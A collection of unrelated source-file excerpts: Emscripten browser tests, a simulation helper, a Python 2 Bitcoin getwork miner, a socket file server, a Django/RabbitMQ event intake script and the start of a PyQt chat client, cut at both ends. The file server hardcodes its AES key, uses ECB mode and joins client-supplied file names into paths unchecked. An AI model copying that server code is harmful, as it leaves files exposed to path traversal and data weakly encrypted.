self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that it is possible to load two asm.js compiled programs to one page when both --separate-asm and MODULARIZE=1 is used, by assigning
# the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
@no_fastcomp('offset converter is not supported on fastcomp')
def test_offset_converter(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
|
wfsim_utils.py
|
import numpy as np
import os
import pandas as pd
import time
from threading import Thread
instruction_dtype = [('event_number', np.int), ('type', np.int), ('t', np.int),
('x', np.float32), ('y', np.float32), ('z', np.float32),
('amp', np.int), ('recoil', '<U2')]
def rand_instructions(input_inst):
n = input_inst['nevents'] = input_inst['event_rate'] * input_inst[
'chunk_size'] * input_inst['nchunk']
input_inst['total_time'] = input_inst['chunk_size'] * input_inst['nchunk']
inst = np.zeros(2 * n, dtype=instruction_dtype)
uniform_times = input_inst['total_time'] * (np.arange(n) + 0.5) / n
inst['t'] = np.repeat(uniform_times, 2) * int(1e9)
inst['event_number'] = np.digitize(inst['t'],
1e9 * np.arange(input_inst['nchunk']) *
input_inst['chunk_size']) - 1
inst['type'] = np.tile([1, 2], n)
inst['recoil'] = ['er' for i in range(n * 2)]
r = np.sqrt(np.random.uniform(0, 48 ** 2, n))
t = np.random.uniform(-np.pi, np.pi, n)
inst['x'] = np.repeat(r * np.cos(t), 2)
inst['y'] = np.repeat(r * np.sin(t), 2)
inst['z'] = np.repeat(np.random.uniform(-100, 0, n), 2)
nphotons = np.random.uniform(200, 2050, n)
nelectrons = 10 ** (np.random.uniform(1, 4, n))
inst['amp'] = np.vstack([nphotons, nelectrons]).T.flatten().astype(int)
return inst
def inst_to_csv(instructions, csv_file):
pd.DataFrame(rand_instructions(instructions)).to_csv(csv_file, index=False)
def get_timing_grid(input_inst):
n = input_inst['nevents'] = input_inst['event_rate'] * input_inst[
'chunk_size'] * input_inst['nchunk']
input_inst['total_time'] = input_inst['chunk_size'] * input_inst['nchunk']
timing_grid = np.linspace(0, input_inst['total_time'], n + 1) * 1e9
return timing_grid
def check_for_strax_data():
strax_folder = "strax_data"
if os.path.exists(strax_folder):
if input(f"Data found in '{strax_folder}', press [y] to remove and "
f"create new data\n").lower() == 'y':
return True
# return False
return False
def timed_check_for_strax_data():
time_out = 5 #s
answer = False
print(f"Please answer within {time_out} seconds.")
def check():
time.sleep(time_out)
if answer is True:
return
else:
print("Too Slow")
return False
Thread(target=check).start()
answer = check_for_strax_data()
return answer
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8912
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
Server.py
|
import sys
import os
import socket
import struct
import threading
import time
from Crypto.Cipher import AES
# -*- coding=utf-8 -*-
# serverIp = '172.18.35.225'
serverIp = '192.168.199.218'
# Leo's laptop in dormitory
secretary_key = "project-C/S and P2P protocol key"
# serverIp = '127.0.0.1'
serverPort = 6789
messageSize = 1036
requestSize = 208
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind((serverIp, serverPort))
serverSocket.listen(10)
Encryptor = AES.new(secretary_key)
pad = b'\x00'
requestList = []
lineNum = 0
nowLine = 0
lock = threading.Lock()
class UnExist(Exception):
def __init__(self, arg="File does not exist, the connection is closed"):
super(UnExist, self).__init__(arg)
def myPrint(printStr, num=1):
global lineNum
lineNum += num
print(printStr)
def service():
global lineNum
print("listening")
while True:
newsock, addrAndPort = serverSocket.accept()
lock.acquire()
if len(requestList) != 0:
myPrint("\n\n\nRequest accepted", 3)
else:
myPrint("\nRequest accepted", 2)
task = threading.Thread(
target=dealRequest, args=(newsock, addrAndPort))
task.start()
def dealRequest(sock, addrAndPort):
# resourPath = 'D:\Resources'
resourPath = 'Resources'
global Encryptor
global lineNum, nowLine, requestList
printLine = 0
myPrint("Tackleing a request from " + str(addrAndPort))
request = sock.recv(requestSize)
reqPro, reqSer, reqVer, reqId, filename = struct.unpack('!4H200s', request)
# print(reqSer)
originreqSer = reqSer
if reqSer != 2:
filename = filename.decode().split('\00')[0]
myPrint("Sending file " + filename)
if reqSer == 1:
myPrint("Encrypted")
elif reqSer == 2:
with open(os.path.join(resourPath, "catalogueFile.txt"), "w") \
as catalogueFile:
catalogueFile.write(requestCatalogue())
filename = "catalogueFile.txt"
nowLine = lineNum
lock.release()
try:
if os.path.exists(os.path.join(resourPath, filename)):
errorCode = 0
FileSize = os.path.getsize(os.path.join(resourPath, filename))
filereq = os.path.join(resourPath, filename)
Sendsize = 0
if reqSer == 1:
FileSize += 16 - FileSize % 16
with open(os.path.join(resourPath, filename), 'rb') as sendFile:
while True:
lock.acquire()
dataBody = sendFile.read(messageSize - 12)
if not dataBody:
packet = struct.pack('!6H', reqPro, reqSer, reqVer,
reqId, 12, errorCode)
sock.sendall(packet)
if reqSer != 2:
print("\nThe file is sent")
nowLine += 1
lock.release()
break
else:
if reqSer == 1:
appended = (16 - (len(dataBody) % 16)) * pad
validLen = len(dataBody)
reqSer = validLen
dataBody += appended
dataBody = Encryptor.encrypt(dataBody)
packet = struct.pack(
'!6H%ds' % len(dataBody), reqPro, reqSer, reqVer,
reqId, 12 + len(dataBody), errorCode, dataBody)
sock.sendall(packet)
Sendsize += len(dataBody)
reqSer = originreqSer
if reqSer != 2:
if str(addrAndPort) not in requestList:
printLine = lineNum
lineNum += 1
requestList.append(str(addrAndPort))
if printLine == nowLine:
print(
"\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
elif printLine < nowLine:
print(
'\x1b[%dA' %
(nowLine - printLine) + "\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
else:
print(
'\x1b[%dB' %
(printLine - nowLine) + "\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
nowLine = printLine
lock.release()
# sys.stdout.write("\rSend %f%%" %
# ((Sendsize / FileSize) * 100))
# sys.stdout.flush()
else:
errorCode = 1
packet = struct.pack('!6H', reqPro, reqSer, reqVer, reqId, 12,
errorCode)
sock.sendall(packet)
raise UnExist()
except UnExist as e:
myPrint(e.args)
except Exception as e:
myPrint(e.args)
# print(packet)
raise e
finally:
sock.close()
if str(addrAndPort) in requestList:
requestList.remove(str(addrAndPort))
if len(requestList) == 0:
print('\x1b[%dB' % (lineNum - nowLine) + '', end='')
def requestCatalogue(sourcePath='Resources', dirpath='.'):
fileList = ""
dirpathFather, catalogueName, fileNames = next(os.walk(sourcePath))
fileNames.sort()
catalogueName.sort()
for i in fileNames:
if i != "catalogueFile.txt":
fileList += (os.path.join(dirpath, i) + "\n")
for i in catalogueName:
fileList += requestCatalogue(
os.path.join(sourcePath, i), os.path.join(dirpath, i))
return fileList
if __name__ == '__main__':
service()
|
oase_accept.py
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
運用基盤連携処理
"""
import os
import sys
import django
import json
import pytz
import datetime
import subprocess
import traceback
import ast
import pika
import time
import threading
import copy
from time import sleep
# --------------------------------
# 環境変数取得
# --------------------------------
try:
oase_root_dir = os.environ['OASE_ROOT_DIR']
run_interval = os.environ['RUN_INTERVAL']
python_module = os.environ['PYTHON_MODULE']
log_level = os.environ['LOG_LEVEL']
except Exception as e:
oase_root_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../')
run_interval = "10"
python_module = "/usr/bin/python3"
log_level = "NORMAL"
# --------------------------------
# パス追加
# --------------------------------
sys.path.append(oase_root_dir)
# --------------------------------
# django読み込み
# --------------------------------
os.environ['DJANGO_SETTINGS_MODULE'] = 'confs.frameworkconfs.settings'
django.setup()
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from libs.backyardlibs.backyard_common import disconnect
from libs.commonlibs.oase_logger import OaseLogger
logger = OaseLogger.get_instance() # ロガー初期化
from web_app.models.models import User, EventsRequest, RuleType
from web_app.serializers.events_request import EventsRequestSerializer
from libs.commonlibs import define as defs
from libs.commonlibs.rabbitmq import RabbitMQ
from libs.webcommonlibs.events_request import EventsRequestCommon
from libs.webcommonlibs.common import TimeConversion
# MAX件数
MAX_COUNT = 100
THREAD_LOCK = threading.Lock()
data_obj_list = []
################################################################
def check_key_error(trace_id, json_str):
"""
[メソッド概要]
イベントリクエストの各キーの正常性チェック
※try の中で呼び出すこと
"""
err_code = EventsRequestCommon.check_events_request_key(json_str)
if err_code != EventsRequestCommon.REQUEST_OK:
err_keyname = ''
if err_code == EventsRequestCommon.REQUEST_ERR_RULETYPE_KEY:
err_keyname = EventsRequestCommon.KEY_RULETYPE
elif err_code == EventsRequestCommon.REQUEST_ERR_REQTYPE_KEY:
err_keyname = EventsRequestCommon.KEY_REQTYPE
elif err_code == EventsRequestCommon.REQUEST_ERR_DATETIME_KEY:
err_keyname = EventsRequestCommon.KEY_EVENTTIME
elif err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_KEY:
err_keyname = EventsRequestCommon.KEY_EVENTINFO
logger.user_log('LOSM22001', err_keyname, trace_id)
raise Exception()
################################################
def check_evinfo_error(trace_id, json_str, ruletypeid, evinfo_length):
"""
[メソッド概要]
イベントリクエストのイベント情報の正常性チェック
※try の中で呼び出すこと
"""
# イベント情報のチェック
err_code = EventsRequestCommon.check_events_request_len(
json_str, evinfo_length)
if err_code != EventsRequestCommon.REQUEST_OK:
if err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_TYPE:
logger.user_log('LOSM22002', trace_id,
ruletypeid, 0, evinfo_length)
raise Exception()
elif err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_LENGTH:
logger.user_log('LOSM22002', trace_id, ruletypeid, len(
json_str[EventsRequestCommon.KEY_EVENTINFO]), evinfo_length)
raise Exception()
raise Exception()
################################################
def make_evinfo_str(json_str):
"""
[メソッド概要]
DB登録用にイベント情報を文字列に整形
"""
evinfo_str = ''
for v in json_str[EventsRequestCommon.KEY_EVENTINFO]:
if evinfo_str:
evinfo_str += ','
if not isinstance(v, list):
evinfo_str += '"%s"' % (v)
else:
temp_val = '['
for i, val in enumerate(v):
if i > 0:
temp_val += ','
temp_val += '"%s"' % (val)
temp_val += ']'
evinfo_str += '%s' % (temp_val)
return evinfo_str
################################################
def data_list(body, user, rule_type_id_list, label_count_list):
"""
[メソッド概要]
DB登録するデータをリストにする。
"""
global data_obj_list
now = datetime.datetime.now(pytz.timezone('UTC'))
evinfo_length = 0
ruletypeid = 0
msg = ''
event_dt = '----/--/-- --:--:--'
disconnect()
try:
# フォーマットのチェック
try:
json_str = json.loads(body.decode('UTF-8'))
except json.JSONDecodeError:
logger.user_log('LOSM22000')
raise Exception()
trace_id = json_str[EventsRequestCommon.KEY_TRACEID]
logger.system_log('LOSI22000', trace_id)
# キーのチェック
check_key_error(trace_id, json_str)
# ルール情報の取得
reqtypeid = json_str[EventsRequestCommon.KEY_REQTYPE]
ruletablename = json_str[EventsRequestCommon.KEY_RULETYPE]
if ruletablename not in rule_type_id_list:
rule_type_id_list.update({ruletablename: 0})
label_count_list.update({ruletablename: 0})
rset = RuleType.objects.filter(rule_type_name=ruletablename).values(
'rule_type_id', 'rule_type_name', 'label_count')
for rs in rset:
rule_type_id_list.update(
{rs['rule_type_name']: rs['rule_type_id']})
label_count_list.update(
{rs['rule_type_name']: rs['label_count']})
if ruletablename in rule_type_id_list:
ruletypeid = rule_type_id_list[ruletablename]
evinfo_length = label_count_list[ruletablename]
# イベント情報のチェック
check_evinfo_error(trace_id, json_str, ruletypeid, evinfo_length)
# DB登録用に整形
evinfo_str = make_evinfo_str(json_str)
evinfo_str = '{"EVENT_INFO":[%s]}' % (evinfo_str)
event_dt = json_str[EventsRequestCommon.KEY_EVENTTIME]
event_dt = TimeConversion.get_time_conversion_utc(
event_dt, 'Asia/Tokyo')
json_data = {
'trace_id': trace_id,
'request_type_id': reqtypeid,
'rule_type_id': ruletypeid,
'request_reception_time': now,
'request_user': 'OASE Web User',
'request_server': 'OASE Web',
'event_to_time': event_dt,
'event_info': evinfo_str,
'status': defs.UNPROCESS,
'status_update_id': '',
'retry_cnt': 0,
'last_update_timestamp': now,
'last_update_user': user.user_name,
}
# バリデーションチェック
oters = EventsRequestSerializer(data=json_data)
result_valid = oters.is_valid()
# バリデーションエラー
if result_valid == False:
msg = '%s' % oters.errors
logger.user_log('LOSM22003', trace_id, msg)
return False
# 正常の場合はリスト登録
else:
data_object = EventsRequest(
trace_id=trace_id,
request_type_id=reqtypeid,
rule_type_id=ruletypeid,
request_reception_time=now,
request_user='OASE Web User',
request_server='OASE Web',
event_to_time=event_dt,
event_info=evinfo_str,
status=defs.UNPROCESS,
status_update_id='',
retry_cnt=0,
last_update_timestamp=now,
last_update_user=user.user_name
)
data_obj_list.append(data_object)
return True
except Exception as e:
logger.system_log('LOSM22004', traceback.format_exc())
return False
################################################
def bulk_create():
"""
[メソッド概要]
EventsRequestテーブルに登録
"""
global data_obj_list
global thread_flg
try:
thread_flg = False
with THREAD_LOCK:
data_obj_len = len(data_obj_list)
if data_obj_len <= 0:
return
# 登録用配列にコピー
tmp_data = copy.deepcopy(data_obj_list)
data_obj_list = []
# 一括DB登録
EventsRequest.objects.bulk_create(tmp_data)
# 登録用配列初期化
tmp_data = []
except Exception as e:
logger.system_log('LOSM22005', traceback.format_exc())
################################################
def load_ruletype():
"""
[メソッド概要]
ルール種別管理テーブル情報を読み込む
"""
rule_type_id_list = {}
label_count_list = {}
ruletype = list(RuleType.objects.all().values(
'rule_type_id', 'rule_type_name', 'label_count'))
for rt in ruletype:
rule_type_id = {}
label_count = {}
rule_type_id[rt['rule_type_name']] = rt['rule_type_id']
label_count[rt['rule_type_name']] = rt['label_count']
rule_type_id_list.update(rule_type_id)
label_count_list.update(label_count)
return rule_type_id_list, label_count_list
################################################
if __name__ == '__main__':
# 初期化
loop_count = 0
thread_flg = False
# データ読み込み
rule_type_id_list, label_count_list = load_ruletype()
# 起動時設定情報取得
user = User.objects.get(user_id=1)
accept_settings = RabbitMQ.settings()
# rabbitMQ接続
channel, connection = RabbitMQ.connect(accept_settings)
# キューに接続
channel.queue_declare(queue=accept_settings['queuename'], durable=True)
# ループ
for method_frame, properties, body in channel.consume(accept_settings['queuename']):
if method_frame:
# DB登録リストを作成
_ = data_list(body, user, rule_type_id_list, label_count_list)
# RabbitMQから取得データを消費
channel.basic_ack(method_frame.delivery_tag)
# ループカウントアップ
loop_count = len(data_obj_list)
# コミット件数の場合、DB登録
if loop_count >= MAX_COUNT:
thread_flg = True
thrd = threading.Thread(target=bulk_create())
thrd.start()
elif not thread_flg:
thread_flg = True
thrd = threading.Timer(0.1, bulk_create)
thrd.start()
# 念のためclose処理
channel.close()
connection.close()
|
client.py
|
"""
MIT License
Copyright (c) 2021 CarlFandino
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from PyQt5 import QtWidgets,QtCore,QtGui,uic
import socket
import threading,time
class RegisterUi(QtWidgets.QWidget):
def __init__(self,parent=None):
super(RegisterUi,self).__init__(parent)
uic.loadUi("register_ui.ui",self)
class MessageFrame(QtWidgets.QLabel):
def __init__(self,animBool,y,text,sender,parent=None,x=650,width=151,height=31):
super(MessageFrame,self).__init__()
self.Message_2 = QtWidgets.QLabel(parent)
self.Message_2.setEnabled(True)
self.Message_2.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color: rgb(255, 74, 74);\n"
"color: rgb(255, 255, 255);")
self.Message_2.setAlignment(QtCore.Qt.AlignCenter)
self.Message_2.setText(text)
self.Message_2.setGeometry(QtCore.QRect(x, y,width, height))
self.FromYou = QtWidgets.QLabel(parent)
self.FromYou.setGeometry(QtCore.QRect(x+30, y-20, 111, 16))
font = QtGui.QFont()
font.setFamily("Microsoft JhengHei UI")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.FromYou.setFont(font)
self.FromYou.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.FromYou.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.FromYou.setText(f"From {sender}")
self.Message_2.show()
self.FromYou.show()
if animBool == True:
self.anim(y)
else:
self.Message_2.setGeometry(QtCore.QRect(350, y, 151, 31))
self.FromYou.setGeometry(QtCore.QRect(380, y-20, 111, 16))
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_2,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(350,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
self.animMessage2 = QtCore.QPropertyAnimation(self.FromYou,b"pos")
self.animMessage2.setEndValue(QtCore.QPoint(380,y-20))
self.animMessage2.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage2.setDuration(100)
self.animMessage2.start()
class ClientMessage(QtWidgets.QLabel):
def __init__(self,animBool,y,text,sender,parent=None,x=-200,width=151,height=31):
